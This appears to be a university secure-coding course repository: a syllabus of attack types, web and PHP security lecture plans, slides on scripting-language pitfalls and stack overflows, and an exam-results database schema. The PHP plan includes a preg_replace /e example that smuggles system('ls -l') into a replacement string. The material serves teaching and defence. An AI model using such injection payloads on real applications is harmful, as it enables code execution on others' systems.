--------------------------------------------------------------------------------
  1 | Weeks
  2 | 1 Intros
  3 | 2 Types of attacks
  4 | 3 Script languages
  5 | 4 Script languages & Web
  6 | 5 Web & Exam
  7 | 6 Compiled languages
  8 | 7 Compiled languages
  9 | 8 C# & Java
 10 | 9 Unix/Linux security
 11 | 10 Windows
 12 | 
 13 | 1 (ALL)
 14 | - Intro
 15 | - Programming languages (interpretative and compiled)
 16 | - Types of attacks
 17 |   - injection
 18 | - format string
 19 | - path
 20 | - shell
 21 | - sql
 22 | - code
 23 | - XSS
 24 | - CSRF
 25 | - Unicode
 26 |   - overflow
 27 | - stack
 28 | - heap
 29 | - integer
 30 | - memory allocation
 31 | - underflow
 32 | - off by one
 33 |   - logical
 34 | - DNS
 35 | - Timing (password brute-forcing)
 36 | - Crypto
 37 | - Denial of service
 38 | - Input validation
 39 | 2  Types of attacks
 40 | - Input validation
 41 |   - Protocol complexity(state machine, turing complete) (ManiaX)
 42 |   - Environment (Marian)
 43 |   - Direct input (Marian)
 44 | - Race conditions (Marian)
 45 |   - non re-entrent functions (DB, Shared mem, files)
 46 |   - mutex/futex/spinlock/RCU/fcntl
 47 |   - acter model (no shared resources architecture)
 48 | - Timing
 49 | 3 Script languages
 50 | General problems in script languages
 51 | - Hash implementation(collisions) (ManiaX)
 52 | - SQL (ManiaX)
 53 | - Code (Marian)
 54 | - Weaktyping
 55 | - PHP (Marian)
 56 |   - SQL
 57 |   - Code
 58 |   - Shell
 59 |   - general language issues
 60 | - Ruby (Petko)
 61 | - Perl (Marian)
 62 |   - SQL
 63 |   - Shell
 64 |   - Code
 65 |   - general language issues
 66 | 4 Script languages
 67 | - Python (Kiro)
 68 | - Bash (Marian)
 69 | - JavaScript (Joan)
 70 | - Web
 71 | 5 Web
 72 | WEB (Petko)
 73 | - XSS
 74 | - CSRF
 75 | - Hijacking
 76 |   - cookies
 77 |   - domains
 78 | - Exams
 79 | 6 Compiled languages
 80 | - Shellcode
 81 |   - arch (ARM, i386, x86-64) ManiaX
 82 |     - ARM 32/64
 83 |     - i386/x86-64
 84 |   - NOP, JMP HackMan
 85 |   - shellcode HackMan
 86 |   - return oriented programming HackMan
 87 | 7 Compiled languages
 88 | - Stack overflow HackMan
 89 | - Heap overflow HackMan
 90 | - Memory allocator HackMan
 91 |   - how to use double free
 92 |   - use after free
 93 |   - overwrite memory allocator structure
 94 | 
 95 | - Stack canarry HackMan
 96 | - ASLR HackMan
 97 | - NX HackMan
 98 | - Integer overflows ManiaX
 99 |   - type conversion
100 |   - sign extension
101 | - Uninitialized data ManiaX
102 | 8 C# & Java
103 | - C#(Joan)
104 |   - SQL
105 |   - Shell
106 |   - Code
107 |   - general language issues
108 | - Java (da vidq predlojenieto na Nakov)
109 |   - SQL
110 |   - Shell
111 |   - Code
112 |   - Hash implementation(collisions)
113 |   - general language issues
114 | - Exams
115 | 9 Linux (Marian)
116 | - Kernel level exploits
117 | - proper setuid
118 | - linker
119 | - capabilities
120 | - namespaces
121 | - chroot
122 | 10 Windows
123 | Windows (Bobi)
124 | 11
125 | Demo
126 | 12
127 | - Crypto (ManiaX)
128 | - Defensive Programming (Marian)
129 | Misc
130 | - Packet in packet injection (ManiaX)
131 | - ???
132 | 
133 | 
134 | Find security issues with the following software:
135 | - Moodle
136 | - Joomla
137 | - WordPress
138 | - Linux Kernel
139 | Every proven security issue is elidgable for 1 to 3 points.
140 | 


--------------------------------------------------------------------------------
/lecture-plans/web-security.txt:
--------------------------------------------------------------------------------
 1 | - XSS
 2 | - CSRF
 3 | - Hijacking
 4 |   - cookies
 5 |   - domains
 6 | 
 7 | * How browsers work
 8 |  - makeing the actual requests
 9 |  - building the DOM tree
10 |  - applying CSS changes
11 |  - loading and executing JS
12 |  - WebSockets
13 | 
14 | * Hijacking
15 |  - cookies and their options - https://tools.ietf.org/html/rfc6265#section-4.1
16 |   Set-Cookie: name=value; OPTIONS name2=value2; OPTIONS
17 |   Options can be:  expires / max-age / domain / path / secure / httponly / extension
18 |  - web application sessions are actually cookies in the browser and file/db storage linked to that cookie
19 |  - domains
20 |    registrar lock
21 |    transperant proxy (MITM)
22 | 
23 | * Cross Site Scripting - XSS 
24 |   https://en.wikipedia.org/wiki/Cross-site_scripting
25 |   https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
26 | 
27 | * Cross Site Request Forgery - CSRF
28 |  - CSRF tokens are used mainly to prevent repetition of requests and requests that are done without prior access to the site
29 |  - useing CSRF tokens also prevent attacks based on the idea that the browser can perform actions of already authenticated users
30 |  - CSRF attacks can also be prevented using decent CORS Access-Control-Allow-Origin setup
31 |  https://en.wikipedia.org/wiki/Cross-site_request_forgery
32 |  https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
33 | 
34 | * Stealing data with CSS
35 |  https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-and-defense
36 | 
37 | * Same Origin Policy - 
38 |  - originaly build to protect the DOM tree from modifications from locations outside the origin domain
39 |  It is URI, which means, that:
40 |    http://go.com != https://go.com
41 |    http://go.com != http://www.go.com
42 |  - generally applies to: Flash, Silverlight, PDF or Ajax(XMLHttpRequest) loading and also WebSockets
43 |  - relaxing the same origin policy:
44 |   document.domain property
45 |   Cross-Origin Resource Sharing (CORS)
46 |   Cross-document messaging (Calling the postMessage() method on a Window object asynchronously fires an "onmessage" event in that window and obviously all of its tabs)
47 |  - <script> and <link type=stylesheet > can load resources from everywhere :(
48 | 
49 | https://en.wikipedia.org/wiki/Same-origin_policy
50 | https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy (read the IE exception)
51 | 
52 | * Cross Origin Resource Sharing
53 |   Request headers:
54 |   - Origin
55 |   - Access-Control-Request-Method
56 |   - Access-Control-Request-Headers
57 |   Response headers:
58 |   - Access-Control-Allow-Origin
59 |   - Access-Control-Allow-Credentials
60 |   - Access-Control-Expose-Headers
61 |   - Access-Control-Max-Age
62 |   - Access-Control-Allow-Methods
63 |   - Access-Control-Allow-Headers
64 | 
65 | * Standard HTTP headers
66 |  - Cache-control - https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9
67 |  - Pragma - https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.32
68 |  - Content-MD5 - https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.15
69 |  - Range - https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.35
70 |  - Retry-After - https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.37
71 | 
72 | * New HTTP headers
73 |  - Strict Transport Security (HSTS) - Strict-Transport-Security 
74 |     https://tools.ietf.org/html/rfc6797#section-8.1
75 |  - HTTP Public Key Pining (HPKP) - Public-Key-Pins / Public-Key-Pins-Report-Only
76 |  - Expect-CT
77 | 
78 |  - Subrequest Integrity (SRI)
79 |     Content-Security-Policy: require-sri-for script;
80 |  - X-Content-Type-Options: nosniff
81 |     - simply put, tell the browser to honor the MIME type and not try to guess what is the type of the file
82 |  - X-XSS-Protection
83 |    - works only on IE
84 |  - X-Frame-Options
85 |    - protect your page from frame injections
86 |  - X-Permitted-Cross-Domain-Policies
87 |    - controls the access for Flash and PDF readers
88 |  - Referrer-Policy
89 |    - used to prevent leaking data via the referrer header
90 | 
91 | * Content Security Policy (CSP)
92 |  Content-Security-Policy / Content-Security-Policy-Report-Only
93 |  https://content-security-policy.com/
94 |  https://www.w3.org/TR/CSP2/
95 |  http://benv.ca/csp-talk-2013
96 | 
97 | 


--------------------------------------------------------------------------------
/lecture-plans/php-security.txt:
--------------------------------------------------------------------------------
  1 | - Configuration
  2 |   - build issues
  3 |   - configuration handling
  4 |     - php.ini
  5 |     - scan dir
  6 |     - local .ini files
  7 |     - ini_set/ini_alter/ini_restore
  8 |     - Apache related
  9 | 		php_value name value
 10 | 		php_flag name on|off
 11 | 		php_admin_value name value
 12 | 		php_admin_flag name on|off
 13 |   - configuration options
 14 |     Modules
 15 | 		enable_dl
 16 | 		extension_dir
 17 |     Error handling
 18 | 		error_append_string
 19 | 		error_prepend_string
 20 | 		error_reporting
 21 | 		expose_php
 22 | 		track_errors
 23 | 		log_errors (but log_errors_max_len)
 24 | 	File handling
 25 | 		allow_url_fopen
 26 | 		allow_url_include
 27 | 		auto_append_file
 28 | 		auto_prepend_file
 29 | 		doc_root
 30 | 		user_dir
 31 | 		user_ini.filename
 32 | 		open_basedir
 33 | 		include_path	(pear modules)
 34 | 		upload_tmp_dir
 35 | 	Limits
 36 | 		max_execution_time
 37 | 		memory_limit
 38 | 		post_max_size
 39 | 		upload_max_filesize
 40 | 		max_file_uploads
 41 |     General
 42 | 		always_populate_raw_post_data
 43 | 		variables_order
 44 | 		register_globals
 45 | 		safe_mode
 46 | 		safe_mode_exec_dir
 47 | 		safe_mode_include_dir
 48 | 		safe_mode_allowed_env_vars
 49 | 		safe_mode_protected_env_vars
 50 | 		sql.safe_mode
 51 | 	Sessions
 52 | 		session.save_handler
 53 | 		session.save_path
 54 | 		session.serialize_handler
 55 | - Syntax issues
 56 | - Code injection
 57 |   include, require, require_once, use
 58 | - Code evaluation
 59 |   eval, exec, system, shell_exec(``), popen
 60 | 
 61 | - Configuration
 62 |   - build issues
 63 |   - configuration handling
 64 |     - php.ini
 65 |     - scan dir
 66 |     - local .ini files
 67 |     - ini_set/ini_alter/ini_restore
 68 |     - Apache related
 69 | 		php_value name value 
 70 | 		php_flag name on|off 
 71 | 		php_admin_value name value 
 72 | 		php_admin_flag name on|off
 73 | 
 74 |   - configuration options
 75 |     Modules
 76 |     	enable_dl
 77 | 		extension_dir
 78 |     Error handling
 79 | 		error_append_string
 80 | 		error_prepend_string
 81 | 		error_reporting
 82 |     	expose_php
 83 |     	track_errors
 84 |     	log_errors (but log_errors_max_len)
 85 | 	File handling
 86 | 	    allow_url_fopen
 87 | 	    allow_url_include
 88 | 	    auto_append_file
 89 |     	auto_prepend_file
 90 | 		doc_root
 91 |     	user_dir
 92 |     	user_ini.filename
 93 |     	open_basedir
 94 | 		include_path	(pear modules)
 95 | 		upload_tmp_dir
 96 | 	Limits
 97 |     	max_execution_time
 98 |     	memory_limit
 99 |     	post_max_size
100 | 		upload_max_filesize
101 | 		max_file_uploads
102 |     General
103 |     	always_populate_raw_post_data
104 |     	variables_order
105 |     	register_globals
106 |     	safe_mode
107 |     	safe_mode_exec_dir
108 |     	safe_mode_include_dir
109 |     	safe_mode_allowed_env_vars
110 |     	safe_mode_protected_env_vars
111 |     	sql.safe_mode
112 | 	Sessions
113 |     	session.save_handler
114 |     	session.save_path
115 |     	session.serialize_handler
116 | - Syntax issues
117 | - Code injection
118 |   include, require, require_once, use
119 | - Code evaluation
120 |   eval, exec, passthru, ``, system, shell_exec, popen, proc_open
121 |   - escapeshellarg
122 |   - escapeshellcmd   - this actually esacpes: &#;`|*?~<>^()[]{}$\, \x0A and \xFF
123 | - SQL injection
124 | - Hash collisions
125 |   - SQL
126 |   - Shell
127 |   - Code
128 |   - Hash implementation(collisions)
129 |   - general language issues
130 | 
131 | Arrays vs. Hashes in PHP
132 | 
133 | 
134 | PHP Ini handling:
135 | 
136 |   search for php-%sapi-module-name%.ini in CWD
137 |   search for php-%sapi-module-name%.ini in install/bin
138 |   search for php-%sapi-module-name%.ini in install/lib
139 |   search for php.ini file in CWD
140 |   search for php.ini file in install/bin
141 |   search for php.ini file in install/lib
142 |   ini scan dir
143 |   per-dir configuration (walk trough all dirs and search for php.ini)
144 |   per-host configuration (papers.yuhu.biz.ini)
145 |   user configuration
146 | 
147 | Adds CWD to the search path, for the CGI but not for the CLI.
148 | 
149 | Useful links:
150 | 
151 |   http://eev.ee/blog/2012/04/09/php-a-fractal-of-bad-design/
152 |   https://www.owasp.org/index.php/Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29
153 |   https://www.owasp.org/index.php/Path_Traversal
154 | 
155 | preg_replace("/($username):$password(:.*)/e",
156 |       "'\\1:'.strtolower('  $newpassword')  .'\\2'",
157 |       "'\\1:'.strtolower(''.system('ls -l').'').'\\2'",
158 | $users );
159 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/beamer.my:
--------------------------------------------------------------------------------
  1 | \documentclass[$if(fontsize)$$fontsize$,$endif$$if(handout)$handout,$endif$$if(beamer)$ignorenonframetext,$endif$$for(classoption)$$classoption$$sep$,$endfor$]{$documentclass$}
  2 | $if(theme)$
  3 | \usetheme{$theme$}
  4 | $endif$
  5 | $if(colortheme)$
  6 | \usecolortheme{$colortheme$}
  7 | $endif$
  8 | $if(fonttheme)$
  9 | \usefonttheme{$fonttheme$}
 10 | $endif$
 11 | \usepackage{amssymb,amsmath}
 12 | \usepackage{ifxetex,ifluatex}
 13 | \usepackage{fixltx2e} % provides \textsubscript
 14 | \ifxetex
 15 |   \usepackage{fontspec,xltxtra,xunicode}
 16 |   \defaultfontfeatures{Mapping=tex-text,Scale=MatchLowercase}
 17 | \else
 18 |   \ifluatex
 19 |     \usepackage{fontspec}
 20 |     \defaultfontfeatures{Mapping=tex-text,Scale=MatchLowercase}
 21 |   \else
 22 |     \usepackage[utf8]{inputenc}
 23 |   \fi
 24 | \fi
 25 | \usepackage[utf8]{inputenc}
 26 | \usepackage[russian]{babel}
 27 | $if(natbib)$
 28 | \usepackage{natbib}
 29 | \bibliographystyle{plainnat}
 30 | $endif$
 31 | $if(biblatex)$
 32 | \usepackage{biblatex}
 33 | $if(biblio-files)$
 34 | \bibliography{$biblio-files$}
 35 | $endif$
 36 | $endif$
 37 | $if(listings)$
 38 | \usepackage{listings}
 39 | $endif$
 40 | $if(lhs)$
 41 | \lstnewenvironment{code}{\lstset{language=Haskell,basicstyle=\small\ttfamily}}{}
 42 | $endif$
 43 | $if(highlighting-macros)$
 44 | $highlighting-macros$
 45 | $endif$
 46 | $if(verbatim-in-note)$
 47 | \usepackage{fancyvrb}
 48 | $endif$
 49 | $if(tables)$
 50 | \usepackage{longtable}
 51 | % These lines are needed to make table captions work with longtable:
 52 | \makeatletter
 53 | \def\fnum@table{\tablename~\thetable}
 54 | \makeatother
 55 | $endif$
 56 | $if(url)$
 57 | \usepackage{url}
 58 | $endif$
 59 | $if(graphics)$
 60 | \usepackage{graphicx}
 61 | % Redefine \includegraphics so that, unless explicit options are
 62 | % given, the image width will not exceed the width of the page.
 63 | % Images get their normal width if they fit onto the page, but
 64 | % are scaled down if they would overflow the margins.
 65 | \makeatletter
 66 | \def\ScaleIfNeeded{%
 67 |   \ifdim\Gin@nat@width>\linewidth
 68 |     \linewidth
 69 |   \else
 70 |     \Gin@nat@width
 71 |   \fi
 72 | }
 73 | \makeatother
 74 | \let\Oldincludegraphics\includegraphics
 75 | \renewcommand{\includegraphics}[2][]{\Oldincludegraphics[width=\ScaleIfNeeded]{#2}}
 76 | $endif$
 77 | 
 78 | %% Comment these out if you don't want a slide with just the
 79 | %% part/section/subsection/subsubsection title:
 80 | %\AtBeginPart{
 81 | %  \let\insertpartnumber\relax
 82 | %  \let\partname\relax
 83 | %  \frame{\partpage}
 84 | %}
 85 | %\AtBeginSection{
 86 | %  \let\insertsectionnumber\relax
 87 | %  \let\sectionname\relax
 88 | %  \frame{\sectionpage}
 89 | %}
 90 | %\AtBeginSubsection{
 91 | %  \let\insertsubsectionnumber\relax
 92 | %  \let\subsectionname\relax
 93 | %  \frame{\subsectionpage}
 94 | %}
 95 | %
 96 | $if(strikeout)$
 97 | \usepackage[normalem]{ulem}
 98 | % avoid problems with \sout in headers with hyperref:
 99 | \pdfstringdefDisableCommands{\renewcommand{\sout}{}}
100 | $endif$
101 | \setlength{\parindent}{0pt}
102 | \setlength{\parskip}{6pt plus 2pt minus 1pt}
103 | \setlength{\emergencystretch}{3em}  % prevent overfull lines
104 | $if(numbersections)$
105 | $else$
106 | \setcounter{secnumdepth}{0}
107 | $endif$
108 | $if(verbatim-in-note)$
109 | \VerbatimFootnotes % allows verbatim text in footnotes
110 | $endif$
111 | $if(lang)$
112 | \usepackage[$lang$]{babel}
113 | $endif$
114 | $for(header-includes)$
115 | $header-includes$
116 | $endfor$
117 | 
118 | $if(title)$
119 | \title{$title$}
120 | $endif$
121 | $if(subtitle)$
122 | \subtitle{$subtitle$}
123 | $endif$
124 | $if(author)$
125 | \author{$for(author)$$author$$sep$ \and $endfor$}
126 | $endif$
127 | $if(date)$
128 | \date{$date$}
129 | $endif$
130 | 
131 | \begin{document}
132 | $if(title)$
133 | \frame{\titlepage}
134 | $endif$
135 | 
136 | $for(include-before)$
137 | $include-before$
138 | 
139 | $endfor$
140 | $if(toc)$
141 | \begin{frame}
142 | \tableofcontents[hideallsubsections]
143 | \end{frame}
144 | 
145 | $endif$
146 | $body$
147 | 
148 | $if(natbib)$
149 | $if(biblio-files)$
150 | $if(biblio-title)$
151 | $if(book-class)$
152 | \renewcommand\bibname{$biblio-title$}
153 | $else$
154 | \renewcommand\refname{$biblio-title$}
155 | $endif$
156 | $endif$
157 | \begin{frame}[allowframebreaks]{$biblio-title$}
158 | \bibliography{$biblio-files$}
159 | \end{frame}
160 | 
161 | $endif$
162 | $endif$
163 | $if(biblatex)$
164 | \begin{frame}[allowframebreaks]{$biblio-title$}
165 | \printbibliography[heading=none]
166 | \end{frame}
167 | 
168 | $endif$
169 | $for(include-after)$
170 | $include-after$
171 | 
172 | $endfor$
173 | \end{document}
174 | 


--------------------------------------------------------------------------------
/presentations/scripting-languages.pandoc:
--------------------------------------------------------------------------------
  1 | % Scripting Languages
  2 | % Network Security II - secure coding
  3 | % Marian HackMan Marinov \<mm@yuhu.biz\>
  4 | 
  5 | # General Issues of the scripting languages
  6 | 
  7 | ## General Issues
  8 | 
  9 | * Weak typing
 10 | * Code injection
 11 | 	* File inclusion
 12 | 	* Evaluation
 13 | 	* Regular Expression Injection
 14 | 	* Flawed File Inclusion Logic
 15 | 	* Path Traversal
 16 | * SQL injection
 17 | 	* Information Leakage
 18 | 	* Disclosure Of Stored Data
 19 | 	* Manipulation of Stored Data
 20 | 	* Bypassing Authorisation Controls
 21 | 	* Defenses Against SQL Injection
 22 | 
 23 | ## DoS caused by the way they are executed
 24 | * Common Gateway Interface RFC 3875 - CGI/1.1
 25 | 	* timeouts between the CGI and the server
 26 | 	* security issues based on the way the CGI is executed
 27 | 		* directly
 28 | 		* suexec
 29 | 		* chrooted
 30 | 		* daemon(fcgi/fpm/PSGI/WSGI...)
 31 | 	* Resource limits (ulimits)
 32 | * Crash the web server when running as module in it
 33 | * Eat all the memory of the server in FCGI, FPM and similar setups
 34 | 
 35 | ## Interpreter problems
 36 | 
 37 | ### Bad implementations
 38 | 
 39 | * CVE-2005-0088 - Python information disclosure
 40 | * Call to the PHP interpreter without any parameters makes it hang 
 41 | 
 42 | ### Bad configuration
 43 | 
 44 | * CVE-1999-0509 - Perl, sh, csh and etc. were placed in publicly accessiable folder
 45 | * PHP-CGI setup initially used Apache actions, which allowed direct access to the interpreter
 46 | * Enabling verbose debug messages on errors
 47 | 
 48 | ### Memory leaks
 49 | 
 50 | * Causing DoS
 51 | * Causing information disclosure
 52 | 
 53 | ### Faulty implementation of system functions
 54 | 
 55 | * Parsing images with PHP code in them can result in the PHP code being executed
 56 | * Parsing images with Python's PIL library can allow arbitrary code execution
 57 | * Python's tempfile.mktemp() is vulnerable to Race condition
 58 | 
 59 | ### Bad handling of environment variables (bad environment sanitation)
 60 | 
 61 | * All - PATH
 62 | * Perl - PERLLIB & PERL5OPT
 63 | * Python -  PYTHONHOME & PYTHONPATH
 64 | * Ruby - DLN_LIBRARY_PATH, RUBYLIB, RUBYLIB_PREFIX, RUBYOPT, RUBYPATH & RUBYSHELL
 65 | * Storing sensitive data in ENV variables is plain **STUPID**
 66 | 	+ the argument that /proc/XXX/environ is -r--------, is **INVALID**
 67 | 	+ multiple processes for the same user can access the env data
 68 | 
 69 | ## Bad language designs 
 70 | * Register_globals in PHP
 71 | 	* responsible for **MILLIONS** of compromised sites
 72 | * Ruby\'s mass-assignment vulnerability
 73 | 	* in 2012 Egor Homakov **OWNED** GitHub because of this
 74 | * + in JavaScript
 75 | * ===/!== in JavaScript and PHP
 76 | * = vs == in C/C++ 
 77 | * variable context in Perl
 78 | * case/switch with fall-trough
 79 | 
 80 | ### JavaScript's +
 81 | ~~~~
 82 |   x = "5" + 6
 83 | ~~~~
 84 | 
 85 | * Will the above code produce 11 or "56"?
 86 | 
 87 | ### JavaScript and PHP ===/!==
 88 | 
 89 | == is equal
 90 | === is equal... but also of the same type
 91 | 
 92 | * Usually NULL is verified
 93 | 
 94 | ### C/C++'s  = and ==
 95 | 
 96 | * = is used for asigning values
 97 | 	* can be easily mispelled
 98 | 
 99 | ~~~
100 |   for ( i = 0, i = 12; i++ ) {
101 | 
102 |   }
103 |   if ( a = 42 ) {
104 | 
105 |   }
106 | ~~~
107 | 
108 | ### Perl variable's context
109 | 
110 | ~~~
111 | my @a=(12, 15, 8);
112 | my $count = scalar(@a);
113 | print "S: ", scalar(@a), "\n#: ", $#a, "\n";
114 | S: 3
115 | #: 2
116 | 
117 | for (my $i = 0; $i <= $count; $i++) {
118 | 
119 | }
120 | ~~~
121 | 
122 | ### C style switch/case statements
123 | 
124 | ~~~
125 | switch(expression){
126 |     case var1:
127 |        setup1_var(s);
128 |     case var2:
129 |        setup2_var(s);
130 |        break;
131 |     default : 
132 |        demo(s);
133 | }
134 | ~~~
135 | 
136 | ### Awkward and rarely understood language specifics
137 | * var = (condition) ? TRUE : FALSE;
138 | * Perl - 3 parameter open()
139 | * PHP variables_order
140 | * SSL (disabling verification)
141 | 
142 | ### Perl three part open
143 | ~~~
144 |     open FILEHANDLE,EXPR
145 |     open FILEHANDLE,MODE,EXPR
146 |     open FILEHANDLE,MODE,EXPR,LIST
147 |     open FILEHANDLE,MODE,REFERENCE 
148 | 
149 | 	open (my $fh, '>', $user_file);
150 |             vs.
151 | 	open (my $fh, "<$user_file");
152 | 
153 | ~~~
154 | 
155 | ### PHP variables_order and GPC order
156 | 
157 | * variables_order
158 | 	* EGPCS (Environment, Get, Post, Cookie, and Server) 
159 | * GPC
160 | 	* When magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash) and NULL's are escaped with a backslash automatically. 
161 | 
162 | ### Special characters
163 | 
164 | * Difference between "" and ''
165 | 
166 | * Difference between '' and ``
167 | 
168 | * Difference between system() and ``
169 | 
170 | 


--------------------------------------------------------------------------------
/test-generator/pgdump.sql:
--------------------------------------------------------------------------------
  1 | --
  2 | -- PostgreSQL database dump
  3 | --
  4 | 
  5 | SET statement_timeout = 0;
  6 | SET client_encoding = 'UTF8';
  7 | SET standard_conforming_strings = on;
  8 | SET check_function_bodies = false;
  9 | SET client_min_messages = warning;
 10 | 
 11 | --
 12 | -- Name: 2014-2015; Type: SCHEMA; Schema: -; Owner: postgres
 13 | --
 14 | 
 15 | CREATE SCHEMA "2015";
 16 | 
 17 | SET search_path = "2015", pg_catalog;
 18 | SET default_tablespace = '';
 19 | SET default_with_oids = false;
 20 | 
 21 | --
 22 | -- Name: results; Type: TABLE; Schema: 2014-2015; Owner: postgres; Tablespace: 
 23 | --
 24 | 
 25 | CREATE TABLE results (
 26 |     id integer NOT NULL,
 27 |     fn integer NOT NULL,
 28 |     exam1 integer,
 29 |     exam2 integer,
 30 |     variant1 integer,
 31 |     variant2 integer,
 32 |     paper integer,
 33 |     gender boolean DEFAULT true NOT NULL,
 34 |     kurs integer,
 35 |     homeworks integer
 36 | );
 37 | 
 38 | CREATE SEQUENCE results_id_seq
 39 |     START WITH 1
 40 |     INCREMENT BY 1
 41 |     NO MINVALUE
 42 |     NO MAXVALUE
 43 |     CACHE 1;
 44 | ALTER SEQUENCE results_id_seq OWNED BY results.id;
 45 | ALTER TABLE ONLY results ALTER COLUMN id SET DEFAULT nextval('results_id_seq'::regclass);
 46 | ALTER TABLE ONLY results ADD CONSTRAINT results_id_key UNIQUE (id);
 47 | ALTER TABLE ONLY results ADD CONSTRAINT results_pkey PRIMARY KEY (fn);
 48 | 
 49 | --
 50 | -- Some views to help list the data 
 51 | --
 52 | 
 53 | CREATE VIEW exam1 AS
 54 |     SELECT results.fn, CASE WHEN (results.exam1 IS NULL) THEN 0 ELSE results.exam1 END AS points, results.variant1 FROM results ORDER BY results.fn;
 55 | 
 56 | CREATE VIEW exam2 AS
 57 |     SELECT results.fn, CASE WHEN (results.exam2 IS NULL) THEN 0 ELSE results.exam2 END AS points, results.variant2 FROM results ORDER BY results.fn;
 58 | 
 59 | CREATE VIEW homeworks AS
 60 |     SELECT results.fn, CASE WHEN (results.homeworks IS NULL) THEN 0 ELSE results.homeworks END AS points FROM results ORDER BY results.fn;
 61 | 
 62 | --
 63 | -- Simplify the calculation for the final results
 64 | --
 65 | 
 66 | CREATE VIEW final_results AS
 67 |     SELECT results.fn, results.exam1, results.exam2, results.paper, results.homeworks, CASE WHEN ((((results.exam1 + results.exam2) + results.paper) + results.homeworks) >= 90) THEN 6 WHEN ((((results.exam1 + results.exam2) + results.paper) + results.homeworks) >= 80) THEN 5 WHEN ((((results.exam1 + results.exam2) + results.paper) + results.homeworks) >= 70) THEN 4 WHEN ((((results.exam1 + results.exam2) + results.paper) + results.homeworks) >= 60) THEN 3 WHEN ((((results.exam1 + results.exam2) + results.paper) + results.homeworks) < 60) THEN 2 ELSE NULL::integer END AS grade FROM results WHERE ((results.exam1 > 0) AND (results.exam2 > 0)) ORDER BY results.fn, CASE WHEN ((((results.exam1 + results.exam2) + results.paper) + results.homeworks) >= 90) THEN 6 WHEN ((((results.exam1 + results.exam2) + results.paper) + results.homeworks) >= 80) THEN 5 WHEN ((((results.exam1 + results.exam2) + results.paper) + results.homeworks) >= 70) THEN 4 WHEN ((((results.exam1 + results.exam2) + results.paper) + results.homeworks) >= 60) THEN 3 WHEN ((((results.exam1 + results.exam2) + results.paper) + results.homeworks) < 60) THEN 2 ELSE NULL::integer END;
 68 | 
 69 | 
 70 | SET search_path = public, pg_catalog;
 71 | 
 72 | CREATE TABLE questions (
 73 |     id integer NOT NULL,
 74 |     date_added timestamp without time zone DEFAULT now() NOT NULL,
 75 |     question text NOT NULL,
 76 |     first_test boolean DEFAULT true NOT NULL
 77 | );
 78 | 
 79 | CREATE SEQUENCE questions_id_seq
 80 |     START WITH 1
 81 |     INCREMENT BY 1
 82 |     NO MINVALUE
 83 |     NO MAXVALUE
 84 |     CACHE 1;
 85 | ALTER SEQUENCE questions_id_seq OWNED BY questions.id;
 86 | ALTER TABLE ONLY questions ALTER COLUMN id SET DEFAULT nextval('questions_id_seq'::regclass);
 87 | ALTER TABLE ONLY questions ADD CONSTRAINT questions_pkey PRIMARY KEY (id);
 88 | 
 89 | CREATE TABLE right_answers (
 90 |     id integer NOT NULL,
 91 |     q_id integer NOT NULL,
 92 |     date_added timestamp without time zone DEFAULT now() NOT NULL,
 93 |     answer text NOT NULL
 94 | );
 95 | 
 96 | CREATE SEQUENCE right_answers_id_seq
 97 |     START WITH 1
 98 |     INCREMENT BY 1
 99 |     NO MINVALUE
100 |     NO MAXVALUE
101 |     CACHE 1;
102 | ALTER SEQUENCE right_answers_id_seq OWNED BY right_answers.id;
103 | ALTER TABLE ONLY right_answers ALTER COLUMN id SET DEFAULT nextval('right_answers_id_seq'::regclass);
104 | ALTER TABLE ONLY right_answers ADD CONSTRAINT right_answers_pkey PRIMARY KEY (id);
105 | ALTER TABLE ONLY right_answers ADD CONSTRAINT right_answers_q_id_fkey FOREIGN KEY (q_id) REFERENCES questions(id) ON UPDATE CASCADE ON DELETE CASCADE;
106 | 
107 | CREATE TABLE wrong_answers (
108 |     id integer NOT NULL,
109 |     q_id integer NOT NULL,
110 |     date_added timestamp without time zone DEFAULT now() NOT NULL,
111 |     answer text NOT NULL
112 | );
113 | 
114 | CREATE SEQUENCE wrong_answers_id_seq
115 |     START WITH 1
116 |     INCREMENT BY 1
117 |     NO MINVALUE
118 |     NO MAXVALUE
119 |     CACHE 1;
120 | ALTER SEQUENCE wrong_answers_id_seq OWNED BY wrong_answers.id;
121 | ALTER TABLE ONLY wrong_answers ALTER COLUMN id SET DEFAULT nextval('wrong_answers_id_seq'::regclass);
122 | ALTER TABLE ONLY wrong_answers ADD CONSTRAINT wrong_answers_pkey PRIMARY KEY (id);
123 | ALTER TABLE ONLY wrong_answers ADD CONSTRAINT wrong_answers_q_id_fkey FOREIGN KEY (q_id) REFERENCES questions(id) ON UPDATE CASCADE ON DELETE CASCADE;
124 | 
125 | 
126 | 
127 | 
128 | --
129 | -- PostgreSQL database dump complete
130 | --
131 | 


--------------------------------------------------------------------------------
/presentations/types-of-attacks.pandoc:
--------------------------------------------------------------------------------
  1 | % Types of attacks
  2 | % Network Security II - secure coding
  3 | % Marian HackMan Marinov \<mm@yuhu.biz\>
  4 | 
  5 | # Buffer overflow
  6 | - Stack overflow
  7 | - Heap overflow
  8 | - Arithmetic overflow
  9 | - Off-by-one overflow
 10 | 
 11 | # Stack overflow
 12 | 
 13 | - What is a stack?
 14 | 
 15 | ~~~~
 16 | Unallocated space
 17 | -----------------------
 18 | c[0]
 19 |       char c[12]
 20 |                  c[11]
 21 | -----------------------
 22 |       char *bar
 23 | -----------------------
 24 |  Saved frame pointer
 25 | -----------------------
 26 |     Return Address
 27 | -----------------------
 28 | Parent routine's stack
 29 | ~~~~
 30 | 
 31 | # Stack overflow
 32 | 
 33 | - How does it normally work?
 34 | 
 35 | ~~~~
 36 | Unallocated space
 37 | -----------------------
 38 |  h | e | l | l | o | \n
 39 |       char c[12]
 40 | 
 41 | -----------------------
 42 |       char *bar
 43 | -----------------------
 44 |  Saved frame pointer
 45 | -----------------------
 46 |     Return Address
 47 | -----------------------
 48 | Parent routine's stack
 49 | ~~~~
 50 | 
 51 | # Stack overflow
